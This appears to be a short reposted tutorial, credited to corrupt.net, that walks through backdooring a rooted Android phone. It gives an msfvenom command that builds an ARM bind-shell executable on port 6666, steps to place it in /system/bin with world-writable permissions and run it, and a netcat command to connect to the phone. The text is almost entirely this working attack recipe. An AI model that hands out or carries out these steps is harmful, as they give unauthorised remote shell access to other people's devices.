The steps given by him are as follows,
1) Create ARM executable
msfvenom -p linux/armle/shell_bind_tcp -f elf LPORT=6666 > /tmp/backdoor
2) Mount your android /system/bin dir for r/w
I used “Root Explorer” app for this. There are other ways to do it.
3) Copy /tmp/backdoor (from Backtrack) to /system/bin/backdoor (your phone) and chmod 777
4) Run ‘backdoor’ on your phone. (Use a terminal emulator, or find any other way )
5) Connect to phone
nc your.phone.ip.address 6666
6) When connection is established, set PATH variable
He further says it still needs root permission plant this, and shell does not listen persistently, so when we disconnect, the file must be run again on the phone.
Source : corrupt.net